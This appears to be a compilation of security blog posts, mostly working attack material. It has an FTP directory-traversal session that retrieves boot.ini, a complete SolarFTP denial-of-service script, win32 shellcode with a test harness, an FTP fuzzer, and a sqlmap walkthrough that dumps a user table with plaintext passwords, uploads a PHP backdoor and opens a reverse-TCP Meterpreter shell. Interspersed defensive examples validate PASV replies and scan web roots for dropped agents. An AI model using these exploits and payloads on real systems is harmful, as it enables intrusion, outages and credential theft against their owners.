Remove Comments from Configuration

Configuration files usually ship with the developer's comments, which help you figure out which options and arguments are available. Once you are familiar with the configuration, though, the comments only get in the way, so here is how to strip them (using apache2.conf as an example):

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf | more

or write it to a file:

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.nocomments

Use it with caution and always review the result. You’ve been warned!
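As an added example (not part of the original post), the same transformation in Python, mirroring the sed script rule by rule: `1p` keeps the first line as a header, whole-line comments are deleted, and a blank-preceded `#` tail is cut. The review step lists every directive that lost text, because the sed expression cannot tell a comment from a `#` inside a quoted value; the configuration lines are constructed for the example.

```python
import re

# Python mirror of: sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//'
FULL_LINE_COMMENT = re.compile(r"^[ \t]*#")     # /^[[:blank:]]*#/d
TRAILING_COMMENT = re.compile(r"[ \t]+#.*")     # s/[[:blank:]][[:blank:]]*#.*//

# Constructed sample; the real target would be /etc/apache2/apache2.conf
SAMPLE_CONF = """\
# This is the main Apache server configuration file (constructed sample)
ServerRoot "/etc/apache2"   # where the server lives
  # an indented whole-line comment
Timeout 300
ErrorDocument 404 "Page #4 was not found"
Include ports.conf
"""


def strip_comments(text):
    """Return (stripped_text, cuts), reproducing the sed script's behaviour.

    '1p' prints line 1 before the other rules run, so a leading header comment
    survives (and a non-comment first line would appear twice, just as with sed).
    Whole-line comments are deleted; a ' #...' tail is cut from other lines.
    cuts lists (lineno, original, stripped) for every line that lost text.
    """
    kept, cuts = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if lineno == 1:
            kept.append(line)
        if FULL_LINE_COMMENT.match(line):
            continue
        stripped = TRAILING_COMMENT.sub("", line, count=1)
        if stripped != line:
            cuts.append((lineno, line, stripped))
        kept.append(stripped)
    return "\n".join(kept) + "\n", cuts


def suspicious_cuts(cuts):
    """Cuts that leave an unbalanced double quote: the '#' was part of a value,
    not a comment, and the sed script has silently truncated the directive."""
    return [cut for cut in cuts if cut[2].count('"') % 2 == 1]


if __name__ == "__main__":
    stripped, cuts = strip_comments(SAMPLE_CONF)
    print(stripped)
    for lineno, original, _ in suspicious_cuts(cuts):
        print("REVIEW line %d: %s" % (lineno, original))
```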

QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to an FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue allows an attacker to modify files outside the destination directory and possibly gain access to the system.

Software Description

QuickShare File Server is an easy-to-use file sharing program that helps you build your own file server. Users can access your server through web browsers or FTP clients (in most cases they need not install any extra software). Users can send or receive large files to or from you. You can create accounts and set passwords to protect your files.

Exploit Information

It’s an FTP directory traversal: a user without prior permission can retrieve a file outside the configured directory (e.g. a file from %systemroot%). The vulnerability can be exploited by anonymous or authenticated users.

POC

Below is the proof of concept: an authenticated user logged in to the QuickShare FTP server from Ubuntu Linux. The highlighted lines are the commands I typed into the QuickShare FTP server.

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password: *******
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$

Fix and Update

The QuickShare team has fixed this vulnerability in version 1.2.2, see here.

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system.

The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode. The PASV command is issued to tell the server that the client wishes to transfer files in passive mode. FTP servers that support passive mode will respond to such a request with an IP address and port number.

Successful exploitation allows execution of arbitrary code, but requires that the user is tricked into connecting to a malicious FTP server.
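As an added example (not from the post or from FTPGetter), this is how a client should handle the 227 reply described above: every field is bounds-checked before anything is copied or used, the reply length is capped, and the advertised host can be required to match the server we actually connected to. The sample replies are constructed.

```python
import re

# RFC 959 passive-mode reply: "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)"
PASV_REPLY = re.compile(
    r"^227 [^(\r\n]*\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")
MAX_REPLY_LEN = 512   # generous cap for a single control-channel reply line


class PasvParseError(ValueError):
    """The server's 227 reply is malformed, oversized or out of range."""


def parse_pasv_reply(line, expected_host=None):
    """Return (host, port) from a 227 reply, raising PasvParseError on anything odd.

    Validated before use: total reply length, exactly six decimal fields closed
    by ')', each field in 0..255, a non-zero port and, optionally, that the host
    is the server we connected to. A client that copies the reply into a fixed
    buffer, or reads fields without counting them, is what a hostile server hits.
    """
    if isinstance(line, bytes):
        line = line.decode("ascii", errors="replace")
    if len(line) > MAX_REPLY_LEN:
        raise PasvParseError("reply too long (%d bytes)" % len(line))
    match = PASV_REPLY.match(line)
    if match is None:
        raise PasvParseError("not a well-formed 227 reply: %r" % line[:40])
    fields = [int(f) for f in match.groups()]
    if any(f > 255 for f in fields):
        raise PasvParseError("field out of range: %r" % fields)
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise PasvParseError("port 0 is not usable")
    if expected_host is not None and host != expected_host:
        # The data connection belongs with the control-connection peer,
        # not with an arbitrary third host the server chooses for us.
        raise PasvParseError("PASV host %s differs from server %s" % (host, expected_host))
    return host, port


def pasv_reply_is_valid(line, expected_host=None):
    """Boolean convenience wrapper around parse_pasv_reply."""
    try:
        parse_pasv_reply(line, expected_host)
        return True
    except PasvParseError:
        return False


if __name__ == "__main__":
    print(parse_pasv_reply("227 Entering Passive Mode (192,168,1,10,195,80)\r\n"))
    print(pasv_reply_is_valid("227 Entering Passive Mode (" + "9" * 5000 + ")"))
```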

Software Description

Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. Schedule and automate file transfers with a centralized console. Let your computer move or synchronize information securely between home and office automatically according to the schedule!

Exploit Information

The client mishandles the server's response to the PASV command, and that error leads to a buffer overflow. This exploit is unstable and should only be used as a PoC. I tried it several times on various systems; the buffer sometimes changed.

Some Conditions to PoC

This PoC uses “the best-selling feature”, the automated FTP request. For this PoC I use Auto Download with / as the Source Files, and Scheduler Settings set to Repetitive. Make sure the program is running before launching the PoC.

It’s part of “Death of an FTP Client” 🙂
For more information, see:
http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/

Proof of Concept

http://www.exploit-db.com/exploits/16101/

Fix and Update

Do not connect to untrusted FTP servers. No fix or update is available yet; we will update this post when the vendor fixes the bug.

UPDATE: the FTPGetter team has released a new version of FTPGetter; more info on their website.

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial-of-service condition because it fails to properly sanitize user-supplied input. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’ or ‘NLST’ command, a remote attacker can potentially disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer, we tested the FTP server with various commands. The first command we sent was APPE (append), and the Windows exception handler popped up, which confirmed that the server may be vulnerable to some commands.

Unfortunately, the junk we sent overwrote neither SEH nor EIP; it just ended in a denial of service. In conclusion, four commands crash the server: APPE, NLST, PUT and GET.

Proof of Concept

Here is the Python script for the PoC.

#!/usr/bin/env python3

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
#                          digital-echidna
#                                        http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#     say hello to all digital-echidna org crew:
#         otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#     special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 suddenly stops (crashes) when one of these commands is sent
# with an oversized argument: APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashes the Admin Configuration but not the service.
# The stack contains our junk at random offsets. Neither EIP nor SEH is overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket
import sys

# 80000 bytes of 'A' (0x41): the oversized argument that crashes the service
junk = b"\x41" * 80000


def banner():
    print("\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability.")
    print("By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n")


if len(sys.argv) != 4:
    banner()
    print("Usage: %s <target> <ftp user> <ftp password>\n" % sys.argv[0])
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((sys.argv[1], 21))
except socket.error:
    print("Can't connect to server!\n")
    sys.exit(0)

# Log in with the supplied credentials, then send APPE with the oversized argument
s.recv(1024)
s.send(b"USER " + sys.argv[2].encode() + b"\r\n")
s.recv(1024)
s.send(b"PASS " + sys.argv[3].encode() + b"\r\n")
s.recv(1024)
s.send(b"APPE " + junk + b"\r\n")
s.recv(1024)
s.close()

Or you can download it from Exploit-DB at the link below:
http://www.exploit-db.com/exploits/15750/

Fix and Update

Download the latest version from the SolarFTP website.

53 bytes – Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode..

It executes notepad.exe when run. Tested on Windows XP SP3 English.

/*
(o_Ov) say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db, and corelan team
*/

/* shellcodetest.c */

/* 53 bytes. Pushes the string "cmd.exe /c notepad" onto the stack, calls
   WinExec() on it and then ExitProcess(); both addresses are hardcoded for
   kernel32.dll on Windows XP SP3 English, so it only runs there. */
char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
              "\x2d\x11\x11\x11\x11\x50\x68\x6f"
              "\x74\x65\x70\x68\x2f\x63\x20\x6e"
              "\x68\x65\x78\x65\x20\x68\x63\x6d"
              "\x64\x2e\x89\xe3\x50\x53\xbb"
              "\x0d\x25\x86\x7c"          /* Kernel32.dll.WinExec */
              "\xff\xd3\x50\xbb"
              "\x12\xcb\x81\x7c"          /* Kernel32.dll.ExitProcess */
              "\xff\xd3";

int main(int argc, char **argv)
{
    int (*func)(void);

    func = (int (*)(void)) code;
    (*func)();              /* does not return: the shellcode calls ExitProcess */
    return 0;
}

0day Linux Escalation Privilege Exploit Collection (Oct-Nov 2010)

I have created a script that contains the local privilege escalation exploits published by Tavis Ormandy via Exploit-DB.com between October and November 2010.

Take a look here: 201011-0day-linux-exploit

*Update 1: I renamed the file and made the script more comfortable to use.
*Update 2: Moved to GitHub

Please note that I am not responsible for any misuse of this tool; I just collected the exploits into one script. Anyone who downloads this tool is responsible for how they use it.

Very Simple FTP Fuzzer

I have tried to write a simple FTP server fuzzer in Python. The script fuzzes commands like APPE, USER, LIST, CWD, etc.; you can find all the commands here 😉

This script is simply a modified version of muts' simple FTP fuzzer from Offsec training 😀

Hope you like it 🙂

#!/usr/bin/env python3

########################################################
# Very Simple FTP Fuzzer                               #
# this is a modified version from simple ftp fuzzer    #
# coded by muts                                        #
#                                                      #
# thx: oebaj, offsec, xecureit, jasakom, 0x70y         #
########################################################

import socket
import sys
from optparse import OptionParser

usage = "./%prog -t [target] -p [port] -u [ftp user] -P [ftp passwd] -c [command to fuzz]"
usage += "\nContoh: ./%prog -t 192.168.10.10 -p 21 -u ftp -P ftp -c APPE"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="int", action="store", dest="port", default=21,
                  help="Port to connect")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The target server")
parser.add_option("-u", type="string", action="store", dest="username",
                  help="FTP username")
parser.add_option("-P", type="string", action="store", dest="password",
                  help="FTP password")
parser.add_option("-c", type="string", action="store", dest="fuzz",
                  help="Command to Fuzz ")
(options, args) = parser.parse_args()


def banner():
    print("\n\t\t|------------------------------------------------------------------|")
    print("\t\t|" + "Very Simple FTP Fuzzer".center(66) + "|")
    print("\t\t|------------------------[ by modpr0be ]---------------------------|")
    print("\t\t|-----------------[ modpr0be[at]postnix[dot]org ]------------------|")
    print("\t\t|-------------------[ originally coded by muts ]-------------------|")
    print("\t\t|------------------------------------------------------------------|\n")


if len(sys.argv) < 4:
    banner()
    parser.print_help()
    sys.exit(1)


def cmd():
    # One fresh connection per test string: log in, send the fuzzed command, say bye
    for string in buffer:
        print("Fuzzing command " + options.fuzz + ": " + str(len(string)))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((options.target, options.port))
        s.recv(1024)
        s.send(b"USER " + options.username.encode() + b"\r\n")
        s.recv(1024)
        s.send(b"PASS " + options.password.encode() + b"\r\n")
        s.recv(1024)
        s.send(options.fuzz.encode() + b" " + string.encode() + b"\r\n")
        s.recv(1024)
        s.send(b"bye\r\n")
        s.close()


banner()
# Test strings: "A", then 100, 200, ... up to 10000 A's (101 strings in total)
buffer = ["A"]
counter = 100
while len(buffer) <= 100:
    buffer.append("A" * counter)
    counter = counter + 100
cmd()

# (c) 2010 modpr0be

How to: SQLMap (dump and destroy)

SQLMap is a tool that automates the exploitation of SQL injection vulnerabilities, and it is very popular for that. While most web hacking enthusiasts know it as a tool for gathering information and retrieving table contents, I want to show how much more powerful SQLMap is than just “a database dumper tool”.

I will split this into three sections: SQLMap as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.

Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818"

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5


[*] shutting down at: 22:26:52

Yes, we all knew this: it reports the database engine, its version, and the operating system.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --dbs

---------------------------------------------------------------------

[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dumping the databases, yes.. SQLMap always does great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12
Database: webappdb
Table: users
[3 entries]
+---------+----+--------+----------+
| country | id | name   | password |
+---------+----+--------+----------+
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |
+---------+----+--------+----------+

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102'

[*] shutting down at: 22:36:54

SQLMap has done a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?


[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>

Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time SQLMap uploads a PHP file containing shell_exec in order to execute arbitrary commands on the remote system via PHP. Once that is uploaded, SQLMap calls msfpayload (Metasploit Payload) to build a “portable executable” Meterpreter backdoor, which is encoded and uploaded through the PHP shell.

When that is uploaded, SQLMap starts the Metasploit listener (multi/handler) and waits for the “portable exe backdoor” to be executed. Once it runs, the Meterpreter shell comes up 🙂
I will skip some of the output here because it is too long to paste.
---- the output before this line covers creating the PHP shell and uploading it to the document root ----
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>1


which is the local address? [192.168.1.100]
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.100:31503
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITY\SYSTEM
meterpreter>

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\>

OS Pwned!
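As an added example from the defender's side (not part of the post or of sqlmap), a scan of a web root for the artefacts this walkthrough leaves behind: helper files named like the tmpuduwd.php / tmpbpjbr.php / tmpmtonj.exe drops above, executables sitting in the document root, and recently modified PHP files that call shell_exec or a sibling function. The web root and its files are constructed in a temporary directory.

```python
import os
import re
import tempfile
import time

# In the walkthrough above sqlmap dropped tmpuduwd.php, tmpbpjbr.php and tmpmtonj.exe
# into C:/xampp/htdocs/, so the name pattern is tmp + five lowercase letters.
SQLMAP_TMP_NAME = re.compile(r"^tmp[a-z]{5}\.(php|exe)$")
# The post says the uploaded PHP shell relies on shell_exec; the rest are its usual siblings
CMD_EXEC_CALL = re.compile(rb"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(")


def scan_webroot(webroot, newer_than_seconds=24 * 3600, now=None):
    """Return sorted (relative_path, reasons) pairs for files that look like dropped agents.

    A file is reported when its name matches the sqlmap temp pattern, when it is
    an .exe inside the web root, or when it is a PHP file modified within
    newer_than_seconds that calls a command-execution function.
    """
    now = time.time() if now is None else now
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            reasons = []
            if SQLMAP_TMP_NAME.match(name):
                reasons.append("sqlmap-style temporary name")
            if ext == ".exe":
                reasons.append("executable in web root")
            if ext == ".php" and now - os.path.getmtime(path) < newer_than_seconds:
                with open(path, "rb") as fh:
                    head = fh.read(65536)          # enough to see a one-file shell
                if CMD_EXEC_CALL.search(head):
                    reasons.append("recent PHP file calling a command-execution function")
            if reasons:
                findings.append((os.path.relpath(path, webroot), reasons))
    return sorted(findings)


def build_sample_webroot():
    """Constructed web root: the legitimate vid.php, two sqlmap-style drops, an old admin script."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "vid.php": b"<?php echo 'video ' . (int) $_GET['id']; ?>",
        "tmpuduwd.php": b"<?php /* constructed stand-in for the agent */ shell_exec($cmd); ?>",
        "tmpmtonj.exe": b"MZ" + b"\0" * 62,
        "old_tool.php": b"<?php system('ls'); ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    a_month_ago = time.time() - 30 * 24 * 3600   # old_tool.php predates the incident
    os.utime(os.path.join(root, "old_tool.php"), (a_month_ago, a_month_ago))
    return root


if __name__ == "__main__":
    for path, reasons in scan_webroot(build_sample_webroot()):
        print(path, "->", "; ".join(reasons))
```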